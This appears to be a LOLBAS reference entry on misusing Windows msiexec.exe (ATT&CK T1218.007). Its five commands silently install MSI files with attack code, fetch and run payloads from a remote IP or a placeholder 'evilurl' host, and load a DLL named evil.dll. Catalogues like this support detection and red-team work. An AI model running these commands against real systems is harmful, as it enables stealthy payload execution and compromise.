.. /Msiexec.exe
Star

Execute (DLL)

Used by Windows to execute msi files


Paths:

Resources:
Acknowledgements:

Detection:

Execute

  1. Installs the target .MSI file silently.

    msiexec /quiet /i cmd.msi
    Use case
    Execute custom made msi file with attack code
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1218.007
  2. Installs the target remote & renamed .MSI file silently.

    msiexec /q /i http://192.168.100.3/tmp/cmd.png
    Use case
    Execute custom made msi file with attack code from remote server
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1218.007
  3. Calls DllRegisterServer to register the target DLL.

    msiexec /y "C:\folder\evil.dll"
    Use case
    Execute dll files
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1218.007
    Tags
    Execute: DLL
    This LOLBAS executes Dynamic-Link Libraries (DLLs).
  4. Calls DllUnregisterServer to un-register the target DLL.

    msiexec /z "C:\folder\evil.dll"
    Use case
    Execute dll files
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1218.007
    Tags
    Execute: DLL
    This LOLBAS executes Dynamic-Link Libraries (DLLs).
  5. Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.

    msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
    Use case
    Install trusted and signed msi file, with additional attack code as transformation file, from a remote server
    Privileges required
    User
    Operating systems
    Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1218.007